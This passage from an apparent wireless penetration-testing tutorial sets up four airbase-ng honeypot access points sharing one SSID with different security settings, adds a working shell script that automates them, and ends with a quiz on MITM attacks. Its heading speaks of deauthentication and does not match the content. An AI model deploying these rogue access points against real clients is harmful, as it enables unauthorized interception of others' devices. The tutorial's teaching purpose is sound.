Time for action – deauthentication attacks on the client

  1. We will assume that the wireless client has a network Wireless Lab configured on it and that it actively sends Probe Requests for this network when it is not connected to any access point. To find out which security configuration the client has stored for this network, we will create several access points that all advertise the SSID Wireless Lab but each use a different security setting. For our discussion, we will assume that the stored profile is one of an open network, WEP, WPA-PSK or WPA2-PSK, so we need four access points. Since all four will run on a single radio, they must all sit on the same channel. To begin, create four monitor-mode virtual interfaces, mon0 to mon3, by running the airmon-ng start wlan0 command four times (newer versions of airmon-ng create a single interface named wlan0mon instead; additional monitor interfaces on the same radio can then be added with iw phy phy0 interface add mon1 type monitor, and so on):
  2. You can list all the newly created interfaces with the ifconfig -a command (iwconfig also works and additionally shows that each is in Mode:Monitor):
  3. Now we will create the open AP on mon0 with airbase-ng, giving it the ESSID Wireless Lab, its own BSSID and the chosen channel, and no encryption flags at all, so that its beacons have the Privacy bit clear:
  4. Let's create the WEP protected AP on mon1, with the same ESSID and channel but a different BSSID, adding -W 1 so that the beacons set the Privacy bit without carrying any WPA or RSN tag:
  5. The WPA-PSK AP will be on mon2, again with its own BSSID, adding -W 1 -z 2 so that the beacons carry a WPA (TKIP) tag:
  6. The WPA2-PSK AP will be on mon3, with its own BSSID, adding -W 1 -Z 4 so that the beacons carry an RSN (CCMP) tag:
  7. We can run airodump-ng on the same channel to ensure that all four access points are up and running: they show up as four BSSIDs with the same ESSID, and the ENC column reads OPN, WEP, WPA and WPA2 respectively.
  8. Now let's switch the Wi-Fi on on the roaming client. Depending on which Wireless Lab network you connected it to previously, it will associate with the honeypot whose security configuration matches its stored profile. In my case, it connects to the WPA-PSK network. Note that for the WPA-PSK and WPA2-PSK honeypots the client cannot complete the four-way handshake, because the honeypot does not know the passphrase; the association and the start of the handshake are still enough to reveal which profile the client holds.
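As an added example (not the book's own code, whose commands live only in the screenshots), the following POSIX shell script performs steps 1 to 7 with the aircrack-ng tools: it creates the monitor interfaces, builds one airbase-ng command per security profile, launches all four honeypots on one channel and watches them with airodump-ng. The ESSID Wireless Lab, channel 3, the locally administered BSSIDs, the interface names mon0 to mon3 and the radio name phy0 are assumptions of this example; the airbase-ng flags -W, -z and -Z and the iw and airodump-ng invocations are the real ones.

```shell
#!/bin/sh
# Added example, not from the original page: set up the four "Wireless Lab"
# honeypots with airbase-ng, one per security profile, on a single radio.
# Assumed values: ESSID "Wireless Lab", channel 3, the locally administered
# BSSIDs below, interface names mon0..mon3 and radio phy0.  The airbase-ng
# flags are real ones: -W 1 sets the Privacy bit (WEP), -z 2 adds a WPA1/TKIP
# tag and -Z 4 adds a WPA2/CCMP tag to the beacons.
ESSID="Wireless Lab"
CHANNEL=3

# honeypot_cmd PROFILE IFACE: print the airbase-ng command line for one
# honeypot.  Every honeypot shares the ESSID and channel (one radio can only
# sit on one channel at a time) but needs its own BSSID.
honeypot_cmd() {
    case $1 in
        open) bssid=02:00:00:00:00:01; sec="" ;;
        wep)  bssid=02:00:00:00:00:02; sec="-W 1" ;;
        wpa)  bssid=02:00:00:00:00:03; sec="-W 1 -z 2" ;;
        wpa2) bssid=02:00:00:00:00:04; sec="-W 1 -Z 4" ;;
        *)    echo "unknown profile: $1" >&2; return 1 ;;
    esac
    printf 'airbase-ng --essid "%s" -a %s -c %s %s%s\n' \
        "$ESSID" "$bssid" "$CHANNEL" "${sec:+$sec }" "$2"
}

# monitor_ifaces PHY N: create mon0..mon(N-1) as monitor-mode virtual
# interfaces on one radio.  Older airmon-ng created these with repeated
# "airmon-ng start wlan0"; newer versions create only wlan0mon, so iw is used.
monitor_ifaces() {
    i=0
    while [ "$i" -lt "$2" ]; do
        iw phy "$1" interface add "mon$i" type monitor
        ip link set "mon$i" up
        i=$((i + 1))
    done
}

# launch_honeypots: start the four airbase-ng instances in the background,
# then watch the channel with airodump-ng.  The ENC column should read OPN,
# WEP, WPA and WPA2 for the four BSSIDs, and a client that holds a profile for
# the ESSID shows up under the honeypot matching its stored configuration.
launch_honeypots() {
    i=0
    for profile in open wep wpa wpa2; do
        sh -c "$(honeypot_cmd "$profile" "mon$i")" &
        i=$((i + 1))
    done
    airodump-ng -c "$CHANNEL" --essid "$ESSID" mon0
}

# Only touch hardware when explicitly asked (needs root and a Wi-Fi radio):
#   HONEYPOT_RUN=1 sh honeypots.sh
if [ "${HONEYPOT_RUN:-0}" = 1 ]; then
    monitor_ifaces phy0 4
    launch_honeypots
fi
```

Without HONEYPOT_RUN=1 the script only defines the functions, so you can source it and print the exact command for one profile with, for example, honeypot_cmd wpa2 mon3 before committing a radio to it.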

What just happened?

We created multiple Honeypots with the same SSID but different security configurations. Depending on which configuration the client had stored for the "Wireless Lab" network, it connected to the appropriate one.

This technique comes in handy during a penetration test, where you do not know in advance which security configuration the client has stored for a given SSID: by offering the client one honeypot per configuration, you let it reveal the right one by choosing which bait to take. This technique is also called WiFishing.

Have a go hero – baiting clients

Create different security configurations on the client for the same SSID, and check whether your set of Honeypots is able to detect them.

It is important to note that many Wi-Fi clients do not actively probe for the networks stored in their profiles (modern clients typically probe only for networks marked as hidden and otherwise wait for beacons), so you may never see Probe Requests that tell you which SSIDs to bait with, and those networks cannot be discovered with the technique discussed here. The honeypots themselves still work once you know an SSID, because the client picks the beacon that matches its stored profile.

Pop quiz – advanced WLAN attacks

Q1. In an MITM attack, who is in the middle?

  1. The access point.
  2. The attacker.
  3. The victim.
  4. None of the above.

Q2. Dnsspoof:

  1. Spoofs DNS requests.
  2. Spoofs DNS responses.
  3. Needs to run on the DNS server.
  4. Needs to run on the access point.

Q3. A wireless MITM attack can be orchestrated:

  1. On all wireless clients at the same time.
  2. Only one channel at a time.
  3. On any SSID.
  4. Both 2 and 3.

Q4. Which is the interface closest to the victim in our MITM setup?

  1. at0.
  2. eth0.
  3. br0.
  4. en0.